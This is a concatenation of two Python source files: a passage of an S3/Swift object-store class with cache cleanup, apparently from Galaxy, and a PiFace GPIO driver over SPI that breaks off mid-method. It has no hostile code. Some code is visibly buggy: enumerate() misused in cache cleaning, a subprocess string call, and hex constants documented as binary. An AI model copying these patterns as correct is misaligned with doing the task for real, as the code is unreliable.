'max_chunk_size': self.max_chunk_size,
'host': self.host,
'port': self.port,
'use_rr': self.use_rr,
'conn_path': self.conn_path}
except Exception:
# Toss it back up after logging, we can't continue loading at this point.
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in enumerate(file_list):
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
""" Sometimes a handle to a bucket is not established right away so try
it a few times. Raise error is connection is not established. """
for i in range(5):
try:
bucket = self.conn.get_bucket(bucket_name)
log.debug("Using cloud object store with bucket '%s'", bucket.name)
return bucket
except S3ResponseError:
try:
log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
self.conn.create_bucket(bucket_name)
except S3ResponseError:
log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
time.sleep(2)
# All the attempts have been exhausted and connection was not established,
# raise error
raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates, this check sould be implemented- in the mean time, it's not
# looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
key = Key(self.bucket, rel_path)
if os.path.getsize(source_file) == 0 and key.exists():
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
return True
if from_string:
key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
mb_size = os.path.getsize(source_file) / 1e6
if mb_size < 10 or (not self.multipart):
self.transfer_progress = 0 # Reset transfer progress counter
key.set_contents_from_filename(source_file,
reduced_redundancy=self.use_rr,
cb=self._transfer_cb,
num_cb=10)
else:
multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except S3ResponseError:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = in_s3 = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check S3
in_s3 = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_s3:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_s3:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_s3:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# Although not really necessary to create S3 folders (because S3 has
# flat namespace), do so for consistency with the regular file system
# S3 folders are marked by having trailing '/' so add it now
# s3_dir = '%s/' % rel_path
# self._push_to_os(s3_dir, from_string='')
# If instructed, create the dataset in cache & in S3
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_s3(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.get_all_keys(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = Key(self.bucket, rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except S3ResponseError:
log.exception("Could not delete key '%s' from S3", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound( 'objectstore.get_filename, no cache_path: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on S3
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound( 'objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
class SwiftObjectStore(S3ObjectStore):
"""
Object store that stores objects as items in a Swift bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and Swift.
"""
def _configure_connection(self):
log.debug("Configuring Swift Connection")
self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_key,
is_secure=self.is_secure,
host=self.host,
port=self.port,
calling_format=boto.s3.connection.OrdinaryCallingFormat(),
path=self.conn_path)
|
pi_face_gpio_digital.py | """PiFace GPIO pin implementing SPI."""
import threading
from raspy.invalid_operation_exception import InvalidOperationException
from raspy.object_disposed_exception import ObjectDisposedException
from raspy.io import pin_state
from raspy.io import pin_mode
from raspy.io import pin_pull_resistance
from raspy.io.io_exception import IOException
from raspy.io.pi_face_gpio import PiFaceGPIO
from raspy.io.pin_state_change_event import PinStateChangeEvent
try:
from spidev import SpiDev
except ImportError:
msg = "WARNING: spidev not installed or could not be imported "
msg += "(possibly not running on a Raspberry Pi (Linux) host?\n"
msg += "WARNING: Using mock SpiDev instead."
print(msg)
class SpiDev(object):
"""A mock SpiDev class to use when not found (ie. unit tests)."""
def __init__(self):
"""Constructor."""
self.__dev = None
self.__bus = None
self.__speed = None
self.__maxSpeed = 0
self.__buf = list()
def open(self, dev, bus):
"""Open the SPI bus connection.
:param int dev: The device ID.
:param int bus: The bus ID.
"""
self.__dev = dev
self.__bus = bus
def writebytes(self, buf):
"""Write a buffer of values to the bus.
:param list buf: The buffer to write.
"""
self.__buf = buf
def xfer(self, buf, speed):
"""Transfer a buffer of values and read the result.
:param list buf: The buffer to send.
:param int speed: The transfer speed.
:returns: The result buffer.
:rtype: tuple
"""
self.__buf = buf
self.__speed = speed
ret_tup = ()
for i in range(0, len(self.__buf)):
lst = list()
lst.append(self.__buf[i])
new_tup = tuple(lst)
ret_tup += new_tup
return ret_tup
@property
def max_speed_hz(self):
"""Get the maximum bus speed in hz.
:returns: The max bus speed.
:rtype: int
"""
return self.__maxSpeed
@max_speed_hz.setter
def max_speed_hz(self, speed):
"""Set the max bus speed in hz.
:param int speed: The max speed.
"""
self.__maxSpeed = speed
class PiFaceGpioDigital(PiFaceGPIO):
"""PiFace GPIO pin implementing SPI."""
ADDR_0 = 0x01000000 # 0x40 [0100 0000]
ADDR_1 = 0x01000010 # 0x42 [0100 0010]
ADDR_2 = 0x01000100 # 0x44 [0100 0100]
ADDR_3 = 0x01000110 # 0x46 [0100 0110]
DEF_ADDR = ADDR_0
REGISTER_IODIR_A = 0x00
REGISTER_IODIR_B = 0x01
REGISTER_GPINTEN_A = 0x04
REGISTER_GPINTEN_B = 0x05
REGISTER_DEFVAL_A = 0x06
REGISTER_DEFVAL_B = 0x07
REGISTER_INTCON_A = 0x08
REGISTER_INTCON_B = 0x09
REGISTER_IOCON_A = 0x0A
REGISTER_IOCON_B = 0x0B
REGISTER_GPPU_A = 0x0C
REGISTER_GPPU_B = 0x0D
REGISTER_INTF_A = 0x0E
REGISTER_INTF_B = 0x0F
REGISTER_INTCAP_A = 0x10
REGISTER_INTCAP_B = 0x11
REGISTER_GPIO_A = 0x12
REGISTER_GPIO_B = 0x13
GPIO_A_OFFSET = 0
GPIO_B_OFFSET = 1000
IOCON_UNUSED = 0x01
IOCON_INTPOL = 0x02
IOCON_ODR = 0x04
IOCON_HAEN = 0x08
IOCON_DISSLW = 0x10
IOCON_SEQOP = 0x20
IOCON_MIRROR = 0x40
IOCON_BANK_MODE = 0x80
BUS_SPEED = 1000000
WRT_FLAG = 0x00
RD_FLAG = 0x01
def __init__(self, pn, initial_val, spi_address, spi_speed):
"""Initialize a new instance of the raspy.io.pi_face_gpio_digital.PiFaceGpioDigital class.
:param raspy.io.pi_face_pins.PiFacePin pn: The PiFace pin to control.
:param int initial_val: The initial value (state) to set the pin to.
Default is PinState.LOW.
:param int spi_address: The SPI address to use. (Should be ADDRESS_0,
ADDRESS_1, ADDRESS_2, or ADDRESS_3).
:param int spi_speed: The clock speed to set the bus to. Can be powers
of 2 (500KHz minimum up to 32MHz maximum). If not specified, the
default of SPI_SPEED (1MHz) will be used.
:raises: raspy.io.io_exception.IOException if unable to read or write
to the SPI bus.
"""
PiFaceGPIO.__init__(self, pn, initial_val, pn.name)
if spi_speed is None or not isinstance(spi_speed, (int, long)):
spi_speed = self.BUS_SPEED
self.__speed = spi_speed
self.__spi = SpiDev()
try:
self.__spi.open(0, 0)
except Exception:
raise IOException("Unable to open SPI device 0 on bus 0.")
self.__spi.max_speed_hz = self.__speed
self.__address = self.DEF_ADDR
if spi_address is not None:
self.__address = spi_address
self.__currentStatesA = 0x00000000
self.__currentStatesB = 0x11111111
self.__currentDirectionA = 0x00000000
self.__currentDirectionB = 0x11111111
self.__currentPullupA = 0x00000000
self.__currentPullupB = 0x11111111
self.__oldState = pin_state.LOW
self.__pullResistance = pin_pull_resistance.Off
self.__pollThread = None
self.__pollRunning = False
self.__stopEvent = threading.Event()
self.__stopEvent.set()
# IOCON - I/O EXPANDER CONFIGURATION REGISTER
#
# bit 7 BANK: Controls how the registers are addressed
# 1 = The registers associated with each port are separated into
# different banks
# 0 = The registers are in the same bank (addresses are sequential)
# bit 6 MIRROR: INT Pins Mirror bit
# 1 = The INT pins are internally connected
# 0 = The INT pins are not connected. INTA is associated with PortA and
# INTB is associated with PortB
# bit 5 SEQOP: Sequential Operation mode bit.
# 1 = Sequential operation disabled, address pointer does not
# increment.
# 0 = Sequential operation enabled, address pointer increments.
# bit 4 DISSLW: Slew Rate control bit for SDA output.
# 1 = Slew rate disabled.
# 0 = Slew rate enabled.
# bit 3 HAEN: Hardware Address Enable bit (MCP23S17 only).
# Address pins are always enabled on MCP23017.
# 1 = Enables the MCP23S17 address pins.
# 0 = Disables the MCP23S17 address pins.
# bit 2 ODR: This bit configures the INT pin as an open-drain output.
# 1 = Open-drain output (overrides the INTPOL bit).
# 0 = Active driver output (INTPOL bit sets the polarity).
# bit 1 INTPOL: This bit sets the polarity of the INT output pin.
# 1 = Active-high.
# 0 = Active-low.
# bit 0 Unimplemented: Read as '0'.
#
# write io configuration. enable hardware address.
self.__write(self.REGISTER_IOCON_A, self.IOCON_SEQOP | self.IOCON_HAEN)
self.__write(self.REGISTER_IOCON_B, self.IOCON_SEQOP | self.IOCON_HAEN)
# read initial GPIO pin states
self.__currentStatesA = self.__read(self.REGISTER_GPIO_A)
self.__currentStatesB = self.__read(self.REGISTER_GPIO_B)
# set all default pin pull up resistors
# (1 = Pull-up enabled.)
# (0 = Pull-up disabled.)
self.__write(self.REGISTER_IODIR_A, self.__currentDirectionA)
self.__write(self.REGISTER_IODIR_B, self.__currentDirectionB)
# set all default pin states
self.__write(self.REGISTER_GPIO_A, self.__currentStatesA)
self.__write(self.REGISTER_GPIO_B, self.__currentStatesB)
# set all default pin pull up resistors
# (1 = Pull-up enabled.)
# (0 = Pull-up disabled.)
self.__write(self.REGISTER_GPPU_A, self.__currentPullupA)
self.__write(self.REGISTER_GPPU_B, self.__currentPullupB)
# set all default pin interrupts
# (if pin direction is input (1), then enable interrupt for pin)
# (1 = Enable GPIO input pin for interrupt-on-change event.)
# (0 = Disable GPIO input pin for interrupt-on-change event.)
self.__write(self.REGISTER_GPINTEN_A, self.__currentDirectionA)
self.__write(self.REGISTER_GPINTEN_B, self.__currentDirectionB)
# set all default pin interrupt default values
# (comparison value registers are not used in this implementation)
self.__write(self.REGISTER_DEFVAL_A, 0x00)
self.__write(self.REGISTER_DEFVAL_B, 0x00)
# set all default pin interrupt comparison behaviors
# (1 = Controls how the associated pin value is compared for
# interrupt-on-change.)
# (0 = Pin value is compared against the previous pin value.)
self.__write(self.REGISTER_INTCON_A, 0x00)
self.__write(self.REGISTER_INTCON_B, 0x00)
# reset/clear interrupt flags
if self.__currentDirectionA > 0:
self.__read(self.REGISTER_INTCAP_A)
if self.__currentDirectionB > 0:
self.__read(self.REGISTER_INTCAP_B)
def __write(self, register, data):
"""Write the specified byte to the specified register.
:param int register: The register to write to. This should be one of
the register constants.
:param int data: A single byte to write to the register.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI bus.
"""
# create packet in data buffer.
packet = [
self.__address | self.WRT_FLAG, # address byte
register, # register byte
data # data byte
]
try:
self.__spi.writebytes(packet)
except(IOError, SystemError, RuntimeError) as ex:
err_msg = "Failed to write to SPI bus device at address "
err_msg += str(self.__address) + " on channel /dev/spidev0.0"
err_msg += str(ex)
raise IOException(err_msg)
def __read(self, register):
"""Read a single byte from the specified register.
:param int register: The register to write to. This should be one of
the register constants.
:returns: The byte read.
:rtype: int
:raises: raspy.io.io_exception.IOException if unable to read from
the SPI bus.
"""
# create packet in data buffer.
packet = [
self.__address | self.RD_FLAG, # address byte
register, # register byte
0x00000000 # data byte
]
result = 0
try:
temp = self.__spi.xfer(packet, self.__speed)
if temp is not None:
result = temp[2] & 0xFF
except(IOError, SystemError, RuntimeError) as ex:
err_msg = "Failed to write to SPI bus device at address "
err_msg += str(self.__address) + " on channel /dev/spidev0.0"
err_msg += str(ex)
raise IOException(err_msg)
return result
def __set_state_a(self, state):
"""Set the state of this pin if on Port A (outputs).
:param int state: The state to set.
:raises: raspy.io.io_exception.IOException if unable to write to
the SPI port.
"""
# determine pin address.
pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
# determine state value for pin bit
if state == pin_state.HIGH:
self.__currentStatesA |= pin_address
else:
self.__currentStatesA &= ~pin_address
# update state value.
self.__write(self.REGISTER_GPIO_A, self.__currentStatesA)
def __set_state_b(self, state):
"""Set the state of this pin if on Port B (inputs).
:param int state: The state to set.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
# determine pin address
pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
# determine state value for pin bit
if state == pin_state.HIGH:
self.__currentStatesB |= pin_address
else:
self.__currentStatesB &= ~pin_address
# update state value.
self.__write(self.REGISTER_GPIO_B, self.__currentStatesB)
def __set_state(self, state):
"""Set the state of this pin.
:param int state: The state to set.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI port.
"""
if self.state == state:
return
self.__oldState = self.state
PiFaceGPIO.write(self, state)
# determine A or B port based on pin address.
if self.inner_pin.value == self.GPIO_B_OFFSET:
self.__set_state_a(state)
else:
self.__set_state_b(state)
def write(self, state):
"""Write a value to the pin.
:param int state: The pin state value to write to the pin.
:raises: raspy.ObjectDisposedException if this instance has been
disposed.
"""
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
PiFaceGPIO.write(self, state)
self.__set_state(state)
def __evaluate_pin_for_change_a(self, state):
"""Evaluate Port A for pin change.
If the state is different compared to the specified state, then emits
a raspy.io.gpio.EVENT_GPIO_STATE_CHANGED event.
:param int state: The state to check against.
"""
# determine pin address.
pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
# determine if state changed.
if (state & pin_address) != (self.__currentStatesA & pin_address):
# Determine new state value for pin bit.
new_state = pin_state.LOW
if (state & pin_address) == pin_address:
new_state = pin_state.HIGH
if new_state == pin_state.HIGH:
self.__currentStatesA |= pin_address
else:
self.__currentStatesA &= ~pin_address
# change detected for pin.
evt = PinStateChangeEvent(self.__oldState, new_state, pin_address)
self.on_pin_state_change(evt)
def __evaluate_pin_for_change_b(self, state):
"""Evaluate Port B for pin change.
If the state is different compared to the specified state, then emits
a raspy.io.Gpio.EVENT_GPIO_STATE_CHANGED event.
:param int state: The state to check against.
"""
# determine pin address.
pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
# determine if state changed.
if (state & pin_address) != (self.__currentStatesB & pin_address):
# Determine new state value for pin bit.
new_state = pin_state.LOW
if (state & pin_address) == pin_address:
new_state = pin_state.HIGH
if new_state == pin_state.HIGH:
self.__currentStatesB |= pin_address
else:
self.__currentStatesB &= ~pin_address
# change detected for pin.
evt = PinStateChangeEvent(self.__oldState, new_state, pin_address)
self.on_pin_state_change(evt)
def __set_mode_a(self, mode):
"""Set the mode of this pin on Port A.
:param int mode: The pin mode to set.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI bus.
"""
pin_address = self.inner_pin.value - self.GPIO_A_OFFSET
if mode == pin_mode.IN:
self.__currentDirectionA |= pin_address
elif mode == pin_mode.OUT:
self.__currentDirectionA &= ~pin_address
self.__write(self.REGISTER_IODIR_A, self.__currentDirectionA)
self.__write(self.REGISTER_GPINTEN_A, self.__currentDirectionA)
def __set_mode_b(self, mode):
"""Set the mode of this pin on Port B.
:param int mode: The pin mode to set.
:raises: raspy.io.io_exception.IOException if unable to write to the
SPI bus.
"""
pin_address = self.inner_pin.value - self.GPIO_B_OFFSET
if mode == pin_mode.IN:
self.__currentDirectionB |= pin_address
elif mode == pin_mode.OUT:
self.__currentDirectionB &= ~pin_address
self.__write(self.REGISTER_IODIR_B, self.__currentDirectionB)
self.__write(self.REGISTER_GPINTEN_B, self.__currentDirectionB)
def __background_poll(self):
"""The background (asynchronous) poll cycle routine.
This is the callback executed by the poll thread.
:raises: raspy.io.IOException if unable to write to the SPI bus.
"""
while not self.__stopEvent.is_set():
# only process for interrupts if a pin on port A is configured as
# an input pin.
pin_interrupt_state = -1
if self.__currentDirectionA > 0:
# process interrupts for port A.
pin_interrupt_a = self.__read(self.REGISTER_INTF_A)
# validate that there is at least one interrupt active on port
# A.
if pin_interrupt_a > 0:
# read the current pin states on port A.
pin_interrupt_state = self.__read(self.REGISTER_GPIO_A)
# is there an interrupt flag on this pin?
self.__evaluate_pin_for_change_a(pin_interrupt_state)
# only process for interrupts if a pin on port B is configured as
# an input pin.
if self.__currentDirectionB > 0:
# process interrupts for port B.
pin_interrupt_b = self.__read(self.REGISTER_INTF_B)
# validate that there is at least one interrupt active on port
# B.
if pin_interrupt_b > 0:
# read the current pin states on port B.
pin_interrupt_state = self.__read(self.REGISTER_GPIO_B)
# is there an interrupt flag on this pin?
self.__evaluate_pin_for_change_b(pin_interrupt_state)
def cancel_poll(self):
"""Cancel an input poll cycle (if running) started by poll()."""
if self.is_disposed:
return
if self.__stopEvent.is_set() or self.__pollThread is None:
return
self.__stopEvent.set()
self.__pollRunning = False
def poll(self):
"""Start a pin poll cycle.
This will monitor the pin and check for state changes. If a state
change is detected, the raspy.io.Gpio.EVENT_GPIO_STATE_CHANGED event
will be emitted. The poll cycle runs asynchronously until stopped by
the cancel_poll() method or when this object instance is disposed.
:raises: raspy.object_disposed_exception.ObjectDisposedException if
this instance has been disposed.
:raises: raspy.invalid_operation_exception.InvalidOperationException
if the poll thread is already running.
"""
if self.is_disposed:
raise ObjectDisposedException("PiFaceGpioDigital")
